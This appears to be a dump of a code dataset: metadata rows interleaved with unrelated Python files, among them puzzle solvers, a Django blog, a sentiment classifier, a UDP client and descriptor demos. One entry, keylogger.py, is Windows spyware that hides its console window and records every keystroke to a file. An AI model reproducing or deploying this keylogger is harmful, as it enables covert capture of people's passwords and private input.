net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBottleneck2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBottleneck2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBottleneck2)
net(th.rand(1, 1, 4, 16, 32))
| [
"[email protected]"
] | |
1818810ee229cd68db13a66efefecbe5872edcc2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_35/216.py | d0006fc021592ec292be67dc3cf4606ceec3d5d5 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,591 | py | import string
class GraphNode(object):
    """One grid cell in the drainage graph: its position plus flow links."""
    def __init__(self, x_pos, y_pos):
        self.x_pos, self.y_pos = x_pos, y_pos
        self.flows_to = None    # the single downhill neighbour, if any
        self.flows_from = []    # neighbours that drain into this cell
        self.label = None       # basin label, assigned later
    def set_flows_to(self, other):
        """Record that this cell drains into *other* (and back-link it)."""
        assert self.flows_to != other
        self.flows_to = other
        other.flows_from.append(self)
def label_node(node, label):
    """Flood-fill *label* through the whole connected drainage component of *node*.

    Follows both the downhill link and all uphill back-links recursively.
    Raises ValueError if a node already carries a different label.
    """
    if node.label is None:
        node.label = label
        if node.flows_to:
            label_node(node.flows_to, label)
        for from_node in node.flows_from:
            label_node(from_node, label)
    else:
        if node.label != label:
            # Fix: the original executed an undefined name ('adsafa') to abort
            # here; raise a descriptive error instead.
            raise ValueError("Relabeling of node")
def label_nodes(h, w, node_map):
    """Scan the grid in reading order, flood-filling a fresh lowercase label
    into every basin that has not been labeled yet."""
    current_label = 0
    for i in range(h):          # range (not xrange): works on Python 2 and 3
        for j in range(w):
            # Fix: string.lowercase is Python-2-only; ascii_lowercase exists
            # on both Python 2 and 3 and holds the same 26 letters.
            label = string.ascii_lowercase[current_label]
            node = node_map[i][j]
            if node.label is None:
                label_node(node, label)
                current_label += 1
def flow_water(w, h, height_map, node_map):
    """Link every cell to its strictly lowest neighbour.

    Neighbours are examined in the original precedence order North, West,
    East, South, tracking the running minimum, so ties resolve exactly as
    before. A cell with no strictly lower neighbour is a sink and gets no
    outgoing link.
    """
    for i in range(h):          # range (not xrange): works on Python 2 and 3
        for j in range(w):
            lowest = height_map[i][j]
            flow_to = None
            # Candidate neighbours in precedence order: up, left, right, down.
            for ni, nj in ((i - 1, j), (i, j - 1), (i, j + 1), (i + 1, j)):
                if 0 <= ni < h and 0 <= nj < w and height_map[ni][nj] < lowest:
                    lowest = height_map[ni][nj]
                    flow_to = node_map[ni][nj]
            if flow_to is not None:
                node_map[i][j].set_flows_to(flow_to)
def main():
    # Read Google Code Jam "Watersheds" cases from stdin (Python 2 script:
    # raw_input / print statements) and print the basin-label grid per case.
    number_of_cases = int(raw_input())
    for case_number in range(1, number_of_cases+1):
        h,w = map(int, raw_input().split())
        print 'Case #%d:' % (case_number,)
        height_map = []
        node_map = []
        for i in xrange(h):
            # NOTE(review): heights stay strings here, so flow_water compares
            # them lexicographically -- wrong for multi-digit values
            # (e.g. "10" < "9"). Confirm the inputs are single digits.
            height_map.append(raw_input().split())
            line = []
            for j in xrange(w):
                line.append(GraphNode(i,j))
            node_map.append(line)
        flow_water(w, h, height_map, node_map)
        label_nodes(h, w, node_map)
        # Emit the label grid; the trailing comma keeps labels on one row.
        for node_line in node_map:
            for node in node_line:
                print node.label,
            print
main()
#w, h = 3,3
#height_map = []
#node_map = []
#height_map.append([9,6,3])
#height_map.append([5,9,6])
#height_map.append([3,5,9])
#for i in xrange(h):
#line = []
#for j in xrange(w):
#line.append(GraphNode(i,j))
#node_map.append(line)
#flow_water(w, h, height_map, node_map)
#label_nodes(h, w, node_map)
#for node_line in node_map:
#for node in node_line:
#print node.label,
#print
##if node.flows_to:
##print node.x_pos, node.y_pos, node.flows_to.x_pos, node.flows_to.y_pos, node.label
##else:
##print node.x_pos, node.y_pos, -1, -1, node.label | [
"[email protected]"
] | |
3d63d331134d18797d42e9881c410a0bb654d458 | 5f560350d45fb37aa5346ec746d05e7a9cecf583 | /sentiment_analysis_try1.py | 3d5472c9b5f8758f4ab3131c7048d96ec3e19926 | [] | no_license | nana55star/data-science-project-10-master | cb792ea47f8163b56373ab4d5667083fe715ee80 | 08b2fbe6b5829a2857928313accb02db0cebb1fb | refs/heads/master | 2022-11-19T03:15:24.597663 | 2020-07-20T02:25:17 | 2020-07-20T02:25:17 | 280,975,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from flask import Flask, request
import requests
from flask import jsonify
# Initialize flask application
app=Flask(__name__)
# Fetch up to 1000 labelled texts from the local data service.
payload = {'count':1000, 'sort_order': 'ascending' }
result= requests.get("http://127.0.0.1:3000/get_data", payload, headers={'Content-Type': 'application/json'})
result_q = result.json()
# Split the (text, label) rows into two parallel lists.
text=[]
labels=[]
for i in range(len(result_q)):
    text.append(result_q[i][0])
    labels.append(result_q[i][1])
print("first text with id=1: " + str(text[0]) )
print("first label of the first text: " + str(labels[0]) )
# vectorizer
import pickle
# rb
# NOTE(review): pickle.load executes arbitrary code on load -- only open
# model files from a trusted source.
with open('model.pickle', 'rb') as file:
    model = pickle.load(file)
#
with open('vectorizer.pickle', 'rb') as file:
    vectorizer = pickle.load(file)
import re
def clean_text(text):
    """Lowercase a text and strip mentions, URL-ish tokens, e-mails and
    punctuation; only letters, apostrophes and single spaces survive."""
    substitutions = (
        r"@[a-z0-9_]+",        # @mentions
        r"[^ ]+\.[^ ]+",       # URL-ish tokens (anything containing a dot)
        r"[^ ]+@[^ ]+\.[^ ]",  # e-mail addresses
        r"[^a-z' ]",           # everything but letters/apostrophes/spaces
        r" +",                 # collapse runs of spaces
    )
    cleaned = text.lower()
    for pattern in substitutions:
        cleaned = re.sub(pattern, ' ', cleaned)
    return cleaned
# Mapping from numeric class ids to sentiment names.
# NOTE(review): appears unused in this script -- confirm before removing.
result_dict = {0: 'negative', 1: 'positive'}
def get_sentiment(text):
    """Classify *text* with the pickled vectorizer + model.

    Returns the model's predicted label, or the string 'ERROR' if cleaning,
    vectorizing or predicting fails.

    Fix: the bare 'except:' also swallowed SystemExit/KeyboardInterrupt;
    narrowed to Exception while keeping the best-effort contract.
    """
    try:
        text = clean_text(text)
        vector = vectorizer.transform([text])
        result = model.predict(vector)
        return result[0]
    except Exception:
        return "ERROR"
# Run the classifier over every fetched text, collecting the predictions.
texts2=[]
for i in range(len(result_q)):
    sentiment = get_sentiment(result_q[i][0])
    texts2.append(sentiment)
print("First text after being cleaned and transformed to numbers of labels with id=1: " + str(texts2[0]))
# Ask the data service how many rows carry each gold label.
payload_1 = {'label_name':'positive', 'count': 1000 }
result_1= requests.get("http://127.0.0.1:3000/get_data_count", payload_1, headers={'Content-Type': 'application/json'})
payload_2 = {'label_name':'negative', 'count': 1000 }
result_2= requests.get("http://127.0.0.1:3000/get_data_count", payload_2, headers={'Content-Type': 'application/json'})
def accuracy(x_test, y_test):
    """Print and return the accuracy between two label sequences.

    Fix: the original returned the result of print() (always None); the
    computed score is now returned while the printout is kept, which is
    backward compatible because existing callers ignore the return value.
    """
    from sklearn.metrics import accuracy_score
    score = accuracy_score(x_test, y_test)
    print("The accuracy is " + str(score))
    return score
# Compare the predicted labels against the gold labels fetched earlier.
accuracy(labels, texts2)
| [
"[email protected]"
] | |
28e8240ad2da071ca6374a24427c0cf04bf1df66 | 9cfc5ab90362545c38def5c33f2d6bcdc11d65ab | /blog/views.py | 2dfa65dadb84e7084340b0361bd1c79219bc714f | [] | no_license | salehmmasri/django-crud | 377c4d30987425e9d4b8b83cdba41faf036d1c88 | 2de04f36ad612191dd3bbd1f23107af9feadd1ed | refs/heads/master | 2022-12-21T05:09:24.798958 | 2020-09-22T17:33:22 | 2020-09-22T17:33:22 | 297,630,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | from django.shortcuts import render
from django.views.generic import CreateView, UpdateView, DeleteView,TemplateView, ListView, DetailView
from .models import Post
from django.urls import reverse_lazy, reverse
# # Create your views here.
class PostView(ListView):
    """Landing page: lists every Post via the 'home.html' template."""
    model = Post
    template_name = 'home.html'
class PostDetailsViewsp(DetailView):
    """Detail page for a single Post, rendered with 'detail.html'."""
    model = Post
    template_name = 'detail.html'
class BlogCreateView(CreateView):
    """Form view for authoring a new Post."""
    model = Post
    template_name = 'blog_create.html'
    fields = ['title', 'author', 'body']
class BlogUpdateView(UpdateView):
    """Form view for editing an existing Post."""
    model = Post
    template_name = 'blog_update.html'
    fields = ['title', 'author', 'body']
class BlogDeleteView(DeleteView):
    """Confirm-and-delete view; redirects to the home page afterwards."""
    model = Post
    template_name = 'blog_delete.html'
    success_url = reverse_lazy('home')
| [
"[email protected]"
] | |
2c84113914b63d511640aec8c07688f75660e985 | 705458c0781ebd7c13776ebf7d690eaf929a8880 | /day27_20191218/2,类的内置方法.py | 76665ae8c02b6bb29ca6ca2f3e4eb2793b9301a0 | [] | no_license | langlangago/learn_python | 8f2298251ad0c07e8efa298d409cdbe77f60bc1b | 29ca4ce4a0628e9b168b9e314acfe5889eb5fc6a | refs/heads/master | 2020-05-16T15:35:15.212613 | 2020-04-16T03:34:43 | 2020-04-16T03:34:43 | 183,135,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,756 | py | # encoding:utf-8
# __str__, __repr__ 用于解释说明,看起来好懂一点
# str() 转换成字符串 ,== __str__
# repr() 原形毕露,原形显示,== __repr__
# print(1, '1')
# print(repr(1), repr('1'))
# class Teacher:
# def __init__(self,name, age):
# self.name = name
# self.age = age
# def __str__(self):
# return 'This is a Teacher object:%s' % self.__dict__
# def __repr__(self):
# return str(self.__dict__)
#
# alex = Teacher('alex', 22)
# print(alex) # print一个对象的时候,就是调用a.__str__方法
# # 如果类没有自己的__str__方法,就调用父类(object)的__str__方法
# print(repr(alex))
# object里有一个__str__方法,一旦被调用就返回这个方法的内存地址
# l = [1, 2, 3, 4] # l 是list类的一个对象,list类里重新实现了__str__方法,让print后看起来好看一点。
# print(l)
# %s str() print 实际上走的都是__str__
# %r repr() 实际上都是走的__repr__
# __str__没有的时候,可以使用__repr__; __repr__没有的时候,不能使用__str__,就只能使用父类的__repr__
# print(obj), str(), %s 的时候,实际上都是调用了内部的__str__方法,那么他返回的必定是一个字符串;
# 如果自己类中没有__str__方法,会先找自己类中的__repr__替代,如没有__repr__方法,就只能使用父类object的__str__
# repr(),%r 会找__repr__,如果没有,直接找父类的。
# __len__ --> len()
#内置方法有很多,不一定都在object里
#比如,不是所有的对象都能求长度len,所以可以自己实现自己的len
# class Classes:
# def __init__(self, name, student):
# self.name = name
# self.student = []
# def __len__(self):
# return len(self.student)
# def __str__(self):
# return 'classes'
# py_s9 = Classes('python全栈9期', [])
# py_s9.student.append('alex')
# py_s9.student.append('tom')
# print(len(py_s9))
# print(py_s9)
# __del__
# 析构函数,再删除一个对象之前进行一些收尾工作
# class A:
# def __del__(self, f):
# self.f.close()
# a = A()
# a.f = open() # 打开文件 1、 在操作系统中打开了一个文件,2、拿到了文件句柄并放入内存
# del a # 拿到文件句柄,既执行了方法(关闭了文件),又删除了文件句柄
# __call__ ,--> () 相当于调用__call__内置方法
class A:
    """Minimal demo of the __call__ protocol: calling an instance prints
    every attribute it stores."""
    def __init__(self, name):
        self.name = name
    def __call__(self):
        """Print all attributes of this object (translated from the
        original Chinese docstring)."""
        for key in self.__dict__:
            print(key, self.__dict__[key])
# The trailing () calls the fresh instance, i.e. invokes A.__call__.
a = A('alex')()
| [
"[email protected]"
] | |
2fc0eb1ac5dcc2492d8e658d9c76edbee562ba75 | f909758f99f6ab9f150262cd65bc15bbb82e11c4 | /sources/reddit_api_wrapper.py | 16474a397ffab244a9f1845fbfd9e578e3fae775 | [] | no_license | igsi/R2D2 | b05af200c31e596501464f99a60a95516d9ed4fe | c663babff858a17692bd017969e6e48ccb7ad139 | refs/heads/master | 2021-01-22T23:15:57.357311 | 2017-03-24T07:46:53 | 2017-03-24T07:46:53 | 85,620,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | import praw
from r2d2_errors import R2D2_RedditError
class RedditWrapper:
    """Stream Reddit submissions and comments as plain dictionaries via praw."""

    def __init__(self, configuration, subreddits):
        """Build a praw client watching the '+'-joined list of subreddit names."""
        try:
            self.reddit = praw.Reddit(client_id=configuration["client_id"],
                                      client_secret=configuration["client_secret"],
                                      user_agent=configuration["user_agent"])
            # praw expects several subreddits as a single "a+b+c" string.
            combined = subreddits[0]
            for name in subreddits[1:]:
                combined += "+" + name
            self.subreddits = self.reddit.subreddit(combined)
        except Exception as e:
            raise R2D2_RedditError(e.message)

    def getSubmissionsStream(self):
        """Return a generator factory yielding normalized new submissions."""
        return RedditWrapper.itemsStream(self.subreddits.stream.submissions,
                                         RedditWrapper.submissionToDict)

    def getCommentsStream(self):
        """Return a generator factory yielding normalized new comments."""
        return RedditWrapper.itemsStream(self.subreddits.stream.comments,
                                         RedditWrapper.commentToDict)

    @staticmethod
    def itemsStream(itemsGenerator, normalizeItem):
        """Wrap a praw stream: skip the first 100 (historical) items so the
        stream effectively starts "now", then yield normalized items."""
        def stream():
            seen = 0
            for item in itemsGenerator():
                seen += 1
                if seen > 100:
                    yield normalizeItem(item)
        return stream

    @staticmethod
    def submissionToDict(submission):
        """Normalize a praw submission into the shared dictionary format."""
        return RedditWrapper.createItem(submission.id,
                                        "SUBMISSION",
                                        submission.title,
                                        submission.created_utc,
                                        str(submission.subreddit))

    @staticmethod
    def commentToDict(comment):
        """Normalize a praw comment into the shared dictionary format."""
        return RedditWrapper.createItem(comment.id,
                                        "COMMENT",
                                        comment.body,
                                        comment.created_utc,
                                        str(comment.subreddit))

    @staticmethod
    def createItem(id, type, content, timestamp, subreddit):
        """Assemble the normalized item dictionary used across the app."""
        return {RedditWrapper.id_field: id,
                RedditWrapper.type_field: type,
                RedditWrapper.content_field: content,
                RedditWrapper.timestamp_field: timestamp,
                RedditWrapper.subreddit_field: subreddit}

    # Dictionary keys used for normalized items.
    id_field = "reddit_id"
    type_field = "type"
    content_field = "content"
    timestamp_field = "timestamp"
    subreddit_field = "subreddit"
"[email protected]"
] | |
0c31c2c12ba0cee2fca07eaa29b494befb80343a | 1626e16760c9c5b5dc9bd7c345871c716d5ffd99 | /Problems/0001_0099/0037_Sudoku_Solver/Project_Python3/Solution1.py | 55219e728189a2d7038f6a589b53cbfbcce69186 | [] | no_license | NobuyukiInoue/LeetCode | 94ddb19e63cb8d0775cdc13f311fe90c87a1d718 | 3f0ffd519404165fd1a735441b212c801fd1ad1e | refs/heads/master | 2023-09-01T07:38:50.939942 | 2023-08-23T09:51:17 | 2023-08-23T09:51:17 | 158,100,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,391 | py | class Solution:
    # def solveSudoku(self, board: List[List[str]]) -> None:
    def solveSudoku(self, board):
        """
        Do not return anything, modify board in-place instead.

        Backtracking with constraint sets: rows/cols/cells record the digits
        already placed in each row, column and 3x3 box; `empty` is the set of
        cells still to fill.
        """
        from collections import defaultdict
        nums = [str(i) for i in range(1, 10)]
        rows, cols, cells, empty = defaultdict(set), defaultdict(set), defaultdict(set), set()
        # Index the initial board into the constraint sets.
        for i in range(9):
            for j in range(9):
                if board[i][j] == '.':
                    empty.add((i, j))
                else:
                    rows[i].add(board[i][j])
                    cols[j].add(board[i][j])
                    cells[i//3, j//3].add(board[i][j])
        def fill():
            # Most-constrained-cell heuristic: pick the empty cell whose row,
            # column and box already contain the most digits.
            i, j = max(empty, key=lambda x: len(rows[x[0]]) + len(cols[x[1]]) + len(cells[x[0]//3, x[1]//3]))
            empty.remove((i, j))
            for num in nums:
                if not (num in rows[i] or num in cols[j] or num in cells[i//3, j//3]):
                    # Place the digit, recurse, and undo the placement on failure.
                    board[i][j] = num; rows[i].add(num); cols[j].add(num); cells[i//3, j//3].add(num)
                    if not empty: return True
                    if fill(): return True
                    board[i][j] = '.'; rows[i].remove(num); cols[j].remove(num); cells[i//3, j//3].remove(num)
                    # NOTE(review): (i, j) is re-added here but not re-removed
                    # before the next candidate digit is tried -- verify the
                    # backtracking bookkeeping is intentional.
                    empty.add((i, j))
            return False
        if not empty: return
        _ = fill()
| [
"[email protected]"
] | |
f10f571988378799ac15273d5f05eee049bd9d4b | 34bdcfc5d7c884c6fcc79ab264f14a95d63418ac | /Capitulo7_Socket/Cliente_UDP.py | f9300f10bca0c3cbafcd5882e34c8b7ab5bee383 | [] | no_license | giomovini/nanoCouseFiap_python | a8be74eab47b9c8ec30a8983b13fdd64669f690e | 342f6f60a875f2081ec577b0362bdf97781ded43 | refs/heads/main | 2023-04-04T01:40:02.202390 | 2021-04-13T14:55:04 | 2021-04-13T14:55:04 | 346,827,474 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | from socket import *
# Interactive UDP chat client (Portuguese prompts): sends user messages to a
# local server and prints each reply until the user types "X".
servidor = "127.0.0.1"  # server address (localhost)
porta = 43210           # server UDP port
# SOCK_DGRAM = UDP; connect() on a datagram socket just fixes the default peer.
obj_socket = socket(AF_INET, SOCK_DGRAM)
obj_socket.connect((servidor, porta))
saida = ""
# Loop until the user answers "X" (case-insensitive) to the exit prompt.
while saida != "X":
    msg = input("Sua mensagem: ")
    obj_socket.sendto(msg.encode(), (servidor,porta))
    # Block waiting for the server reply (up to 64 KiB).
    dados, origem = obj_socket.recvfrom(65535)
    print("Resposta do Servidor: ", dados.decode())
    saida = input("Digite <X> para sair: ").upper()
obj_socket.close()
| [
"[email protected]"
] | |
7c9fa6cda81eafe310ba5a888b58394318b6dabc | de93337b44c8e90461b20bba29baa9866e5fa974 | /keylogger.py | b918e3f82fb295906ef3f12f33d24fe7c69c7be4 | [] | no_license | felipefbelo/Infosec | b5362519142e3810d942f59a6b9337985fbcf9fc | f272b613ad066c558ae7dbc9c0bfb904818d151b | refs/heads/master | 2022-02-24T03:43:14.950956 | 2022-02-14T23:54:26 | 2022-02-14T23:54:26 | 180,662,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python
import win32console
import win32gui
import pythoncom
import pyHook
# Keylogger em fase de testes...
# SECURITY NOTE: this script is a keylogger (spyware); documented for
# analysis only. Hiding the console window makes the process run invisibly.
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
def OnKeyboardEvent(event):
    # Hook callback invoked by pyHook for every key-down event (Python 2 era).
    if event.Ascii==5:
        # NOTE(review): _exit is never imported (os._exit) -- this branch
        # would raise NameError instead of exiting.
        _exit(1)
    if event.Ascii !=0 or 8:
        # NOTE(review): '!= 0 or 8' is always true ('or 8' is truthy);
        # the intent was probably 'event.Ascii not in (0, 8)'.
        # Read-modify-write the whole log file on every keystroke.
        f=open('C:\Users\fbelo\Downloads\output.txt','r+')
        buffer=f.read()
        f.close()
        f=open('C:\Users\fbelo\Downloads\output.txt','w')
        keylogs=chr(event.Ascii)
        if event.Ascii==13:
            # NOTE(review): '/n' is a literal slash-n, not a newline ('\n').
            keylogs='/n'
        buffer+=keylogs
        f.write(buffer)
        f.close()
# Truncate the log file and write a header before hooking begins.
f1 = open('C:\Users\fbelo\Downloads\output.txt', 'w')
f1.write('Incoming keys:\n')
f1.close()
# Register the callback for every system-wide key-down event (pyHook).
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
# Enter the Windows message pump; blocks forever processing hook events.
pythoncom.PumpMessages()
"[email protected]"
] | |
f4d93c91da7d8510d5fdbdc9854b1470747f5ebf | 19b9bc401df28ede4b4a5f6fa00ee17042299719 | /archive/To02-01/01-30/jingu_01-30.py | 41fe494a1558fad298323d28a96511a96d845074 | [] | no_license | kibitzing/FluentPython | fb0c21c164e0bf7a543e8c3c0d92c6f6c303ebb6 | 75c743ce4c5e65c2d891babd23f0e4b873924000 | refs/heads/master | 2021-07-10T23:42:58.224235 | 2019-02-12T14:24:06 | 2019-02-12T14:24:06 | 147,219,835 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,976 | py | # p642~p646
# created by Jingu Kang on 01-29
# reference: Fluent Python by Luciano Ramalho
# more abstract python.
def cls_name(obj_or_cls):
    """Return the bare class name of *obj_or_cls*, which may be a class or
    an instance."""
    candidate = type(obj_or_cls)
    if candidate is type:
        # The argument is itself a plain class: use it directly.
        candidate = obj_or_cls
    return candidate.__name__.rpartition('.')[-1]
def display(obj):
    """Return a short human-readable description of *obj* for the traces."""
    cls = type(obj)
    if cls is type:
        return '<class {}>'.format(obj.__name__)
    if cls is type(None) or cls is int:
        # None and ints render via repr so values stay visible.
        return repr(obj)
    return '<{} object>'.format(cls_name(obj))
def print_args(name, *args):
    """Print a pseudo method-call trace such as '-> Cls.__get__(...)'."""
    rendered = ', '.join(display(arg) for arg in args)
    print('-> {}.__{}__({})'.format(cls_name(args[0]), name, rendered))
## essential classes for this example
class Overriding:
    """a.k.a data descriptor or enforced descriptor (defines both
    __get__ and __set__); every access is traced."""
    def __get__(self, inst, owner_cls):
        print_args('get', self, inst, owner_cls)
    def __set__(self, inst, val):
        print_args('set', self, inst, val)
class overridingNoGet:
    """an overriding descriptor without __get__ -- writes are traced, reads
    fall back to normal attribute lookup."""
    def __set__(self, inst, val):
        print_args('set', self, inst, val)
class NonOverriding:
    """a.k.a. non-data or shadowable descriptor (only __get__); an instance
    __dict__ entry can shadow it."""
    def __get__(self, inst, owner_cls):
        print_args('get', self, inst, owner_cls)
class Managed:
    """Host class wiring up one descriptor of each flavour plus a method."""
    over = Overriding()
    over_no_get = overridingNoGet()
    non_over = NonOverriding()
    def spam(self):
        """Regular method used to contrast with the descriptors above."""
        print('-> managed.spam({})'.format(display(self)))
# Demo: overriding (data) vs non-overriding descriptors on Managed.
obj = Managed()
obj.over                       # instance access -> Overriding.__get__
Managed.over                   # class access also hits __get__ (instance=None)
print(vars(obj))               # instance __dict__ starts empty
obj.over = 8                   # assignment is intercepted by Overriding.__set__
obj.over                       # read still routed to __get__: data descriptor wins
Managed.over
obj.__dict__['over'] = 8       # writing __dict__ directly bypasses __set__
print(vars(obj))
print(obj.over_no_get)         # no __get__: the descriptor object itself is returned
print(Managed.over_no_get)
obj.over_no_get = 9            # __set__ still intercepts plain assignment
print(obj.over_no_get)
obj.__dict__['over_no_get'] = 9
print(obj.over_no_get)         # the __dict__ entry now shadows reads (no __get__)
obj.over_no_get = 99
print(obj.over_no_get) # not gonna be changed to 99
obj.__dict__['over_no_get'] = 99
print(obj.over_no_get) # changed to 99
| [
"[email protected]"
] | |
5d4e5cf66dd81c1707202cdf95b789e009a79145 | 466a1b7e182be502aa9a0048f6d6216cd7139970 | /moduleFechas.py | 0da26b56d450256eca26476449c9198e9bafea64 | [] | no_license | redtdt/smdh | 168a8babe526dbf4423a588fe9f0286d9802c778 | c83ed5947a01935152b591ca68b8b4e9af2e430d | refs/heads/master | 2020-05-02T02:04:52.334028 | 2012-05-17T15:53:40 | 2012-05-17T15:53:40 | 3,880,045 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,809 | py | #-----------------------------------------------------------------------------
# Name: moduleFechas.py
#
#
# RCS-ID: $Id: moduleFechas.py $
#
# Licence: Sistema de Monitoreo de Derechos Humanos, Compilacion de datos
# Copyright (C) 2010, Asociacion Todos los Derechos para Todos, A.C.
# Registro Publico de Derechos de Autor, Num. de Registro
# 03-2010-101210014200-01, Mexico.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see<http://www.gnu.org/licenses/>.
#
#-----------------------------------------------------------------------------
import calendar
import datetime
def ajustaFecha(tipo, dia, mes, anio, ini, status):
    """Complete a partial date according to *tipo*.

    ini=True snaps missing parts to the start of the period, ini=False to
    its end. Returns a datetime.date, or None when any component is still
    missing/zero.

    Fixes: removed the unused local 'diag'; narrowed the bare except around
    int() to the exceptions it can actually raise.
    """
    try:
        tipo = int(tipo)
    except (TypeError, ValueError):
        tipo = 0
    if tipo == status.idSinDia:
        # Day unknown: first or last day of the month.
        dia = 1 if ini else calendar.monthrange(anio, mes)[1]
    if tipo == status.idSinMes or tipo == 116:  # NOTE(review): 116 is a magic id -- confirm its meaning
        # Month unknown: snap to Jan 1 or Dec 31.
        dia = 1 if ini else 31
        mes = 1 if ini else 12
    if dia and mes and anio:
        return datetime.date(anio, mes, dia)
    return None
def FechasValidas(tipoI, diaI, mesI, anioI, tipoF, diaF, mesF, anioF, status):
    """Return True when the (possibly partial) start date does not come
    after the end date; True as well when either tipo is missing (nothing
    to compare); False when a date cannot be completed."""
    if not (tipoI and tipoF):
        return True  # nothing to compare
    inicio = ajustaFecha(tipoI, diaI, mesI, anioI, True, status)
    fin = ajustaFecha(tipoF, diaF, mesF, anioF, False, status)
    if inicio is None or fin is None:
        return False
    return fin >= inicio
def camposFechasValidas(tipoI, fechaI, tipoF, fechaF, status):
    """Validate a start/end pair given as date-like objects exposing
    day/month/year attributes."""
    return FechasValidas(tipoI, fechaI.day, fechaI.month, fechaI.year,
                         tipoF, fechaF.day, fechaF.month, fechaF.year,
                         status)
def ctrlFechasValidas(ctrlFechaI, tipoI, ctrlFechaF, tipoF, status):
    """Validate a start/end pair read from day/month/year widget triples
    (each control exposes GetValue()); a missing tipo counts as id 0."""
    id_ini = tipoI.id if tipoI else 0
    id_fin = tipoF.id if tipoF else 0
    # Widgets are read in the original left-to-right order: start then end.
    dia_i, mes_i, anio_i = (ctrlFechaI[0].GetValue(),
                            ctrlFechaI[1].GetValue(),
                            ctrlFechaI[2].GetValue())
    dia_f, mes_f, anio_f = (ctrlFechaF[0].GetValue(),
                            ctrlFechaF[1].GetValue(),
                            ctrlFechaF[2].GetValue())
    return FechasValidas(id_ini, dia_i, mes_i, anio_i,
                         id_fin, dia_f, mes_f, anio_f, status)
| [
"adolfo@adlap.(none)"
] | adolfo@adlap.(none) |
57fd18f5e0ee538bd2e8ef81cf834062ab1a26e0 | a19f698185b1700183189d0f1a543f24897b7a51 | /b_utils.py | f09030547ec46ab3d16937bd5bc25d849efb6a31 | [] | no_license | Loken85/behavioural_classification | c5a72f02b5aeff9213e5226cd6a079427f265b2d | 222e734432318bfd44273d21311395ebc4c7f96d | refs/heads/master | 2022-12-10T18:33:53.836142 | 2020-09-07T05:12:13 | 2020-09-07T05:12:13 | 293,425,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,676 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 9 14:48:26 2019
@author: adria
Utilities for automated behavioural state tracking with deeplabcut input
"""
import pandas
import numpy as np
import scipy.io as sio
import matplotlib.pyplot as plt
from matplotlib.animation import FFMpegWriter
# Turns a dataframe into a dictionary of numpy arrays
# one (length X 3) array for each part
def frame_to_darray(data):
    """Convert a MultiIndex (feature, coord) DataFrame into a dict mapping
    each top-level feature name to its ndarray of column values."""
    features = data.T.index.get_level_values(0)
    return {feature: data[feature].to_numpy() for feature in features}
# saves a .mat file for use in matlab. Takes in a dataframe, saves as a
# struct containing a set of numpy arrays
# Currently saves to PWD, TODO: set the filepath dynamically
def expdf_to_matlab(data):
    """Save a DataFrame as 'data_mat.mat' in the CWD, stored as a MATLAB
    struct under the key 'data' (one array per feature)."""
    as_arrays = frame_to_darray(data)
    sio.savemat('data_mat.mat', {'data': as_arrays})
# same as above, but takes in dict or numpy array
# could be combined with a type query...but whatever
def expnp_to_matlab(data):
    """Save a dict or numpy array as 'data_mat.mat' (CWD) under key 'data'."""
    target = 'data_mat.mat'
    sio.savemat(target, {'data': data})
# create a raw projections dataframe. extracts just x and y positions for features
# in feats list
def create_raw_projections(data, feats):
    """Return a frame holding only the x/y position columns for the
    features listed in *feats* (likelihood etc. are dropped)."""
    transposed = data.T.sort_index()
    selected = transposed.loc[(feats, ('x', 'y')), :]
    return selected.T
# aligns the projections to a selected feature. Selected feature positions will
# be all zeros
def align_projections2D(rproj, a_ft, dim):
    """Translate all projections so the anchor feature sits at the origin.

    The anchor column label is a_ft + str(dim); its x/y values are
    subtracted (aligned on the coordinate level) from every feature, so
    the anchor itself becomes all zeros.
    """
    aligned = rproj.copy()
    anchor_label = a_ft + str(dim)
    return aligned.subtract(aligned[anchor_label], level=1)
# redundant
def align_projections3D(rproj, a_ft, n_ft):
    """Placeholder for 3D alignment (marked 'redundant' by the author).

    Fix: the original returned the undefined name 'aproj', which raised a
    bare NameError; raise an explicit NotImplementedError instead.
    """
    raise NotImplementedError("align_projections3D is not implemented")
# plots the wave aplitudes of a single feature projected into wavelet space
# TODO: add figure name and axes labels
def plot_wamps(scalo, freqs, name, figs_per_row=5):
    """Plot each row of *scalo* (wavelet amplitudes) in a grid of subplots.

    Args:
        scalo: 2D array, one trace per row.
        freqs: unused here; kept for interface compatibility.
        name: figure title.
